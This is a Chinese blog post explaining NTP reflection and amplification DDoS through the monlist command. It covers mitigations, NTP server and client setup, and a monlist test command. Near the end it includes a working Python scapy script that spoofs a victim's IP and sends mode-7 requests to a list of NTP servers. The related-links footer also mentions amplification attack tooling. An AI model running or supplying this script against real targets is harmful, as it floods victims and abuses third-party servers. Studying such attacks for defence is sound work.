NTP反射放大攻击漏洞

已于 2024-01-15 15:28:45 修改
阅读量1.5k 收藏 33
点赞数 14
文章标签: 安全
于 2023-12-08 17:41:02 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51214674/article/details/134884175
版权

文章目录

什么是NTP

基于UDP协议的NTP(网络时间协议):使网络中各个计算机时间同步的一种协议

用途:把计算机时钟调节到世界调节时UDP

NTP反射放大攻击

  • UDP协议:面向无连接,客户端发送请求包源IP容易进行伪造

  • 反射攻击:修改客户端发送请求包中源IP为受害者IP,服务器端返回响应包返回到受害者IP

  • 放大攻击:一个请求包收到多个响应包

  • NTP反射放大攻击:一种分布式拒绝服务(DDoS)攻击

    服务器端回复一个带有欺骗源IP地址的数据包,而且至少有一个内置命令会对一个简短的请求发送一个长回复。这使得它成为DDoS工具的理想选择

    NTP 包含一个 monlist 功能( MON_GETLIST),主要用于监控 NTP 服务器。

    NTP 服务器响应monlist后就会返回响应包给和 NTP 服务器进行时间同步的最后 600 个客户端的 IP,响应包按照每 6 个 IP 进行分割,最多有 100 个响应包。

解决方案

  • 可以通过访问open NTP项目来检查网络上是否有开放的NTP服务器支持MONLIST命令运行。

  • NTP和其他基于udp的放大攻击都依赖于源IP地址欺骗。如果攻击者不能欺骗源IP地址,那么他们只能自己攻击DDoS。如果正在运行一个网络,那么应该确保遵循BCP38,并防止带有欺骗源地址的数据包离开主机网络。可以使用麻省理工学院的Spoofer项目的工具来测试你的网络当前是否遵循BCP38。

搭建NTP服务器

部署服务器端

Windows server 2008

  • 修改注册表

image-20231208170136727

依次展开数据项目,计算机\HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\NtpServer,把Enabled设置为1,打开NTP服务

image-20231208170437675

  • 打开NTP服务

image-20231208170649995

找到windows time

image-20231208170840055

image-20231208170915845

windows NTP命令行

启动:net start w32time
停止:net stop w32time

本机测试

如果有回显则服务正常

w32tm /stripchart /computer:127.0.0.1

image-20231208171550910

部署客户端

服务端部署成功后,如果要为客户端提供服务的话需要开放udp协议中的123端口,或者根据自身安全情况关闭防火墙。客户端下可以使用ntpdate命令来同步服务器时间,也可以使用chrony服务。

ntpdate

# 安装ntpdate服务
sudo apt-get install ntpdate

# 安装完成后, 同步时间。xxx.xxx.xxx.xxx为你服务器的IP地址,clock -w把时间写入硬件。
sudo ntpdate xxx.xxx.xxx.xxx && clock -w

chrony

chrony是一个时间同步服务,通过配置可以把一台服务器变为NTP服务端或客户端,这里只用到客户端的功能。

sudo apt-get install chrony

安装完成后打开配置文件

vim /etc/chrony.conf

如果做客户端的话,只需要修改其中的一行文件,最后保存退出。

# xxx为你的IP地址
server xxx.xxx.xxx.xxx

重启chrony服务,使用时间同步服务生效。

systemctl restart chronyd

实验

linux中,可以使用ntpdate、ntpdc进行反射测试。

模拟协议,客户端执行以下命令,执行成功时,说明服务端存在被攻击风险,可实施攻击。

ntpdate -n -c monlist x.x.x.x | wc -l(NTP服务的IP)

测试结果,此处内网由于数据量小

image-20231208173347591

Python利用脚本

#!/usr/bin/env python
# -*- coding: utf-8 -*-

import sys
from scapy.all import *

def attack(target, ntp_server):
    send(IP(dst=ntp_server, src=target)/(UDP(sport=52816)/NTP(version=2, mode=7, stratum=0, poll=3, precision=42)))

if __name__ == "__main__":
    if len(sys.argv) != 3:
        print("执行方法: python xxx.py  攻击目标  ntp服务器文件")
        sys.exit(1)

    target = sys.argv[1]
    ntp_server_file = sys.argv[2]
    for ntp_server in open(ntp_server_file, "r"):
        ntp_server = ntp_server.strip()
        if ntp_server != "":
            attack(target, ntp_server)
§666§
关注
  • 14
    点赞
  • 33
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
基于NTP反射放大攻击DDoS追踪研究
01-14
摘 要:提出了一种利用NTP反射放大攻击的特点,通过对中国大陆开放公共NTP服务的主机定期发起主动探测(执行monlist指令),利用返回信息对全球范围NTP反射类DRDoS攻击事件进行长期追踪观察和统计分析。追踪从2014年2月开始,初始探测范围为大陆近1.4万台NTP服务主机,每隔2 h一个周期持续进行了164天,观测到了针对数十万个IP地址的疑似DDoS攻击行为。
Linux ntp放大攻击脚本,kali linux之DNS,NTP放大攻击
weixin_34486987的博客
04-30 439
DNS放大:产生大流量的攻击方法-----单机的带宽优势,巨大的单机数量形成的流量汇聚,利用协议特性实现放大效果的流量DNS协议放大效果----查询请求流量小,但响应流量可能非常巨大(dig ANY baidu.com @8.8.8.8流量放大约8倍)攻击原理:伪造源地址为被攻击目标地址,向递归域名查询服务器发起查询DNS服务器成为流量放大和实施攻击者,大量DNS服务器实现DDoSNTP放大:网络...
DDOS中的NTP放大攻击危害为什么这么大,如何进行有效的防护
HoewDec的博客
05-17 1001
在1992 年3月,NTP v3版本RFC-1305问世,该版本总结和综合了NTP先前版本和DTSS,正式引入了校正原则,并改进了时钟选择和时钟滤波的算法,而且还引入了时间消息发送的广播模式,这个版本取代了NTP的先前版本。比如说德迅DDoS防护服务,是以省骨干网的DDoS防护网络为基础,结合自研的DDoS攻击检测和智能防护体系,向您提供可管理的DDoS防护服务,自动快速的缓解网络攻击对业务造成的延迟增加,访问受限,业务中断等影响,从而减少业务损失,降低潜在DDoS攻击风险。NTP的防御措施是怎么样的呢?
linux ntp攻击python脚本,(转)如何发现 NTP 放大攻击漏洞
weixin_39928106的博客
05-05 669
转自:http://drops.wooyun.org/tips/4715NTP 漏洞相关的文章在 Drops 已经有过了,并且不止一篇,之所以又翻译了这一片文章,是觉得文章的整体思路很不错,希望对看这篇文章的你有所帮助。BTW:本文翻译比较随意,但是并没有破坏原文含义。0x00 简介NTP 放大攻击其实就是 DDoS 的一种。通过 NTP 服务器,可以把很小的请求变成很大的响应,这些响应可以直接指...
NTP反射放大攻击(一)知识点扫盲
qq_32350719的博客
03-19 2885
NTP反射放大攻击知识点扫盲 什么是NTP服务 NTP是网络时间协议(Network Time Protocol),它是用来同步网络中各个计算机的时间的协议 在计算机的世界里,时间非常地重要,例如对于火箭发射这种科研活动,对时间的统一性和准确性要求就非常地高,是按照A这台计算机的时间,还是按照B这台计算机的时间?NTP就是用来解决这个问题的,NTP(Network Time Protocol,网络...
NTP攻击
qq_73992463的博客
11-02 869
NTP(Network Time Protocol)攻击是一种利用网络时间协议进行攻击的方式,旨在通过发送大量的NTP请求来超载目标服务器或网络,从而导致服务不可用或网络拥塞。我们将全面介绍NTP攻击,包括其定义、攻击方式、攻击架构、防护措施以及与其他攻击方式相比的优势和缺点。
NTP放大攻击
weixin_44110913的博客
11-03 1258
前言 本节学习NTP放大攻击 1、简介 Network Time Protocol 保证网络设备时间同步电子设备互相干扰导致时钟差异越来越大,影响应用正常运行、日志审计不可信服务端口UDP 123 攻击原理 NTP 服务提monlist (MON_GETLIST) 查询功能,监控NTP 服务器的状况客户端查询时,NTP服务...
关于网络时间协议(NTP)mod-6扫描漏洞处理
热门推荐
企业实战系列集 ●●● https://ximenjianxue.blog.csdn.net
07-12 1万+
某次对内网网络设备进行了一次漏洞扫描过程暴露出该漏洞,利用此漏洞可远程NTP服务器响应模式6查询。响应这些查询的设备有可能用于NTP放大攻击。未经身份验证的远程攻击者可能通过精心设计的模式6查询利用此漏洞,导致反映的拒绝服务情况。修复建议:限制NTP模式6查询。漏洞级别:中级.........
NTP-Monlist-Amplification-Attack:演示NTP放大攻击
06-29
然而,NTP也存在安全风险,其中之一就是NTP Monlist放大攻击。这种攻击利用了NTP服务器的一个特性,即Monlist命令,它允许服务器返回最近与之交互过的客户端列表。攻击者可以利用这个特性发动分布式拒绝服务(DDoS)...
ntp攻击
03-03
ntp攻击请先安装zmap解压缩git克隆并解压git clone https://github.com/Scholar-m/ntp-attack && cd ntp-attack && unzip ntp.zip扫描列表zmap -p 123 -M udp --probe-args=file:ntp_123_monlist.pkt -o 1.txt提权...
ddo放大教程+脚本
10-25
用国外G口放大 一个G口能打出30G左右的量,一直自己用的 加分价钱一分货,懂得人来 最好买两台 一台扫表 一台伪造发包 内附各种脚本 例如udp/ntp/syn/tcp/ack等 请勿使用此脚本攻击正规站 解压密码qq2682964474
windowserver2019配置NTP服务
04-08
Window Server 2019配置NTP服务是确保企业网络中所有计算机时间同步的重要步骤,这对于网络认证、日志记录和安全操作等都是至关重要的。NTP(Network Time Protocol)是一种用于同步网络中不同计算机时间的协议。在...
Linux ntp放大攻击脚本,NTP放大攻击
weixin_36212560的博客
04-30 1225
首先NTP放大需要一台可以伪造IP的服务器,不能伪造欺骗的没有任何效果的。先上个效果图。ps:你需要一台服务器,而且能欺骗的服务器,不是服务器都可以的。不能欺骗的服务器攻击是没有任何效果的 这次带来安装攻击脚本的教学,此次不是首创,如有雷同,那就是巧合了!下面进入教学1.首先我们要准备攻击脚本,这个是必须的。进入重点:2.上传脚本到服务器3.重命名为.c。例如:ntp.c(重要的是要保存为.C)...
ntp 4.2.6p5版本漏洞详细
Daoke37的博客
05-24 2444
1. NTP CRYPTO_ASSOC 内存泄漏导致拒绝服务漏洞 (CVE-2015-7701) 2. NTPD 栈缓冲区溢出漏洞(CVE-2014-9295) 3. NTPD PRNG无效熵漏洞(CVE-2014-9293) 4. NTPD PRNG弱加密漏洞(CVE-2014-9294) 5. NTP 身份验证绕过漏洞(CVE-2015-7871) 6. NTP Kiss-o'-Death拒绝服务漏洞 (CV...
NTP反射放大攻击(四)开炮!
qq_32350719的博客
03-19 8224
攻击者 安装python2.7 这个不用说 2.安装scapy 从网址下载:http://www.secdev.org/projects/scapy/files/scapy-2.3.1.zip ,也可以用wget scapy.net cp ~/Downloads/scapy-2.3.1.zip /root unzip scapy-2.3.1.zip cd scapy-2.3.1 python ...
ntp 网络攻击与解决方法(3种)
zyb378747350的专栏
06-19 6687
ntpd 网络攻击
浅谈拒绝服务攻击的原理与防御(5):NTP反射攻击复现
killcoco的小窝
04-25 2692
0×01 故事起因 系列回顾 前两天以为网友stream(年龄、性别不详)私信我说他在阿里云上的服务器被NTP攻击了,流量超过10G,希望我帮忙一起分析一下,复现一下攻击。我这当代雷锋当然非常乐意了,于是我就和stream联系(勾搭)上了,今天我就详细讲一下我们一起复现NTP反射攻击的过程。 0×02 分析攻击数据 stream大兄弟把当时抓到的包发给了我,数据包不大只有3
什么是NTP 放大
chujiuai1874的博客
08-21 419
NTP放大是一种分布式拒绝服务攻击 (DDoS),攻击者利用可公开访问的网络时间协议 (NTP)服务器,以用户数据报协议(UDP)流量对目标站点进行饱和攻击。 网络时间协议 (NTP)是最早的网络协议之一,对于由互联网连接的设备起到同步其时钟的作用。除了时钟同步之外,更旧版本的NTP还支持监...
编程实现ntp反射式拒绝服务攻击
最新发布
06-06
NTP反射式拒绝服务攻击利用网络时间协议(NTP)服务器的monlist功能,通过构造伪造IP地址的UDP包向NTP服务器发起请求,使得服务器向伪造的IP地址返回大量的响应数据,从而造成目标服务器的带宽资源被消耗殆尽,最终导致服务不可用。 为了防止NTP反射式拒绝服务攻击,我们可以采取以下几种措施: 1. 禁用NTP服务器的monlist功能; 2. 使用网络设备上的访问控制列表(ACL)来限制NTP流量; 3. 在网络边界上实现反射攻击防御机制,例如使用防火墙、入侵防御系统等; 4. 对网络中的所有设备进行定期漏洞扫描和安全评估,及时更新安全补丁和升级设备。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

§666§

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值